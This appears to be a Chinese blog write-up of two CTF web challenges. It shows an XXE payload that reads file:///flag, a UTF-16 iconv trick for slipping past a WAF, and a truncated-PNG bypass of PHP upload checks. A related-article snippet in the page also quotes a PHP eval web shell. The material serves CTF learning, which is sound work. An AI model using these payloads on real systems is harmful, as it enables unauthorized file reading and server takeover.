[CSAWQual 2019]Web_Unagi XXE漏洞 [HarekazeCTF2019]Avatar Uploader 1 finfo_file和getimagesize

最新推荐文章于 2024-05-31 11:48:50 发布
最新推荐文章于 2024-05-31 11:48:50 发布
阅读量2.8k 收藏 3
点赞数
文章标签: 前端 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/scrawman/article/details/122718510
版权

[CSAWQual 2019]Web_Unagi
看提示有告诉你xml的格式
在这里插入图片描述

<?xml version='1.0'?>
<!DOCTYPE users [
<!ENTITY xxe SYSTEM "file:///flag" >]>
<users>
    <user>
        <username>bob</username>
        <password>passwd2</password>
        <name> Bob</name>
        <email>bob@fakesite.com</email>  
        <group>&xxe;</group>
    </user>
</users>

在这里插入图片描述
但如果在group和email的元素里显示长度会不够
通过对比User板块可以发现还有一个intro元素

<?xml version='1.0'?>
<!DOCTYPE users [
<!ENTITY xxe SYSTEM "file:///flag" >]>
<users>
    <user>
        <username>bob</username>
        <password>passwd2</password>
        <name> Bob</name>
        <email>bob@fakesite.com</email>  
        <group>CSAW2019</group>
        <intro>&xxe;</intro>
    </user>
</users>

直接上传会提示被WAF拦截了,
在这里插入图片描述
通过iconv转换成utf-16编码绕过

iconv -f utf8 -t utf-16 1.xml>2.xml

iconv是linux用来转换文件编码方式的命令
在这里插入图片描述
[HarekazeCTF2019]Avatar Uploader 1
在这里插入图片描述
登录以后看到文件上传,这题是提供源码的

//upload.php
// check whether file is uploaded
if (!file_exists($_FILES['file']['tmp_name']) || !is_uploaded_file($_FILES['file']['tmp_name'])) {
  error('No file was uploaded.');
}

// check file size
if ($_FILES['file']['size'] > 256000) {
  error('Uploaded file is too large.');
}

// check file type
$finfo = finfo_open(FILEINFO_MIME_TYPE);
$type = finfo_file($finfo, $_FILES['file']['tmp_name']);
finfo_close($finfo);
if (!in_array($type, ['image/png'])) {
  error('Uploaded file is not PNG format.');
}

// check file width/height
$size = getimagesize($_FILES['file']['tmp_name']);
if ($size[0] > 256 || $size[1] > 256) {
  error('Uploaded image is too large.');
}
if ($size[2] !== IMAGETYPE_PNG) {
  // I hope this never happens...
  error('What happened...? OK, the flag for part 1 is: <code>' . getenv('FLAG1') . '</code>');
}

// ok
$filename = bin2hex(random_bytes(4)) . '.png';
move_uploaded_file($_FILES['file']['tmp_name'], UPLOAD_DIR . '/' . $filename);

$session->set('avatar', $filename);
flash('info', 'Your avatar has been successfully updated!');
redirect('/');

简单概括就是要让finfo_file判断是png但是getimagesize判断不是png就能得到flag。
finfo_file通过文件头来判断,getimagesize还通过长宽等很多其他信息来判断
找一张png图片看一下(ps.要求的图片尺寸要很小,我剪裁了好多次)
保留文件头,其他删掉试一下,记得多删掉一点,留下IHDR就可以了
在这里插入图片描述
上传后成功获得flag在这里插入图片描述

scrawman
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[HarekazeCTF2019]Avatar Uploader 1
snowlyzz的博客
09-14 541
详细讲解 getimagesize函数原理和绕过
unagi:搜索和下载Hyper Suprime-Cam(HSC)斯巴鲁战略调查(SSP)中的数据
05-02
乌纳吉(ウナギ) 除了是世界上最美味的鱼的一个, unagi还可以帮助您通过浏览或了Hyper Suprime-CAM(HSC)斯巴鲁战略...2019/06/03:添加了对HSC PDR2的支持(需要更多测试) PDR2_DUD和PDR2_WIDE重新运行中的所有
PHP获取远程图片宽、高
李维山的博客
02-20 459
使用函数 getimagesize: <?php $remote_png_url = 'http://xxx.png'; $img_data = getimagesize($remote_png_url); print_r($img_data); 打印结果如下: Array ( [0] => 290 [1] => 69 [2] => 3 [3] => width="290" height="69" [b
[CSAWQual 2019]Web_Unagi
最新发布
2302_79839194的博客
05-31 305
且在About中告诉我们了,flag位于 /flag ==> 使用file协议直接读取本地文件**(这里指的是,我们上传文件给服务器,服务器解析文件,读取的是服务器的本地文件,也就是flag文件)**|:管道符,将前一个的结果(2.xml文件内容),作为下一个命令的输入 ==> 将内容进行编码的转换。发现是xml数据格式,且存在上传文件的功能 => 联想到 XXE注入(引用外部实体)-t:指定输出文件的编码格式是UTF-16BE(大端字节序)-f:指定输入文件(2.xml)是UTF-8编码格式。
[CSAWQual 2019]Web_Unagi ---不会编程的崽
不会编程的崽的博客
03-07 535
xxe编码绕过
unagi:无的WordPress仪表板
03-04
Unagi是一个WordPress插件,可帮助您保持管理仪表板的清洁。 这是一个零配置的插件,只需激活并清除它。 Unagi-“这不是您的本领,而是您所拥有的。” 它是如何工作的? 它缓冲连接到admin_notices操作的所有输出...
-Unagi-Ingress-Hackathon
02-14
1. **Ingress游戏规则和策略**:理解游戏的基本玩法、目标和战术,以便更好地解决黑客马拉松中的挑战。 2. **Jupyter Notebook使用**:熟练掌握创建和运行代码单元格、数据导入导出、数据分析、可视化和文档编写。 ...
Python库 | unagi-0.1.3.dev3.tar.gz
05-24
资源分类:Python库 所属语言:Python 资源全名:unagi-0.1.3.dev3.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
unagi:现代浏览器上的RPG编辑器
05-04
a木 现代浏览器上的RPG编辑器 环境 到目前为止,仅在Mac OS X Chrome上对此进行了测试。 怎么跑 要求 脚步 运行./build.sh 运行go run testserver.go 访问
[CSAWQual 2019]Web_Unagi xxe转码绕过waf
qq_54929891的博客
04-28 1371
搜索给我们的信息 flag在flag下面,可能要用到文件读取或者系统命令 可以看到它叫我们上传一个xml文件,应该是xxe漏洞了 这里应该是提示我们会回显哪些属性,可以看到password没有显示出来 利用之前的XXE模板https://xz.aliyun.com/t/6887#toc-0 <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]&gt.
buuctf_练[CSAWQual 2019]Web_Unagi
m0_66225311的博客
10-26 275
`XXE`漏洞利用,`xml`文件转换编码绕过`WAF`(UTF-8 --> UTF-16),`xml`文件格式的书写
[BUU刷题记录]day01-起步
anwen12的博客
12-13 4618
BUU-WEB 这是一个菜鸡的蜕变 先小记录一下题目环境部署必备的docker安装 sudo apt-get remove docker docker-engine docker.io containerd runc sudo apt-get update sudo apt-get install apt-transport-https ca-certificates curl gnupg lsb-release curl -fsSL https://download.docker.com/linux
[Web安全学习] ctfshow-文件上传总结
Y1seco的博客
08-03 582
图片马 <?php eval($_POST[a]);?> 文件后缀修改为jpg,png,gif等,burp修改上传成功后的后缀为.php(或其他根据过滤情况) 利用上传user.ini进行文件上传绕过 user.ini说明: 自 PHP 5.3.0 起,PHP 支持基于每个目录的 INI 文件配置。此类文件 仅被 CGI/FastCGI SAPI 处理。此功能使得 PECL 的 htscanner 扩展作废。如果你的 PHP 以模块化运行在 Apache 里,则用 .htaccess 文件有同
BUUCTF刷题十一道【缺】(10)
qq_45837896的博客
11-13 1551
文章目录EasyBypass[SCTF2019]Flag Shop[BSidesCF 2019]SVGMagic[极客大挑战 2020]Greatphp[GYCTF2020]Easyphp【留坑-反序列化】[HarekazeCTF2019]Avatar Uploader 1[FireshellCTF2020]Caas[ISITDTU 2019]EasyPHP[N1CTF 2018]eating_cms[GYCTF2020]Ez_Express【留坑-nodejs原型链污染】[强网杯 2019]Upload
[CSAWQual 2019]Unagi
07-27
回答: 在CSAWQual 2019比赛中,关于Unagi的问题,根据引用\[1\]、\[2\]和\[3\]的内容,Unagi是一个涉及XML注入的题目。参赛者需要利用之前的XXE模板或者自己构造的XML文件,通过上传恶意的XML文件来获取flag。具体的操作是将文件名改为1.xml,然后上传即可得到flag。\[1\]\[2\]\[3\] #### 引用[.reference_title] - *1* [[CSAWQual 2019]Web_Unagi xxe转码绕过waf](https://blog.csdn.net/qq_54929891/article/details/124481254)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [[CSAWQual 2019]Web_Unagi](https://blog.csdn.net/m0_62905261/article/details/126189583)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [BUUCTF [CSAWQual 2019]Web_Unagi 1](https://blog.csdn.net/weixin_45642610/article/details/120201638)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值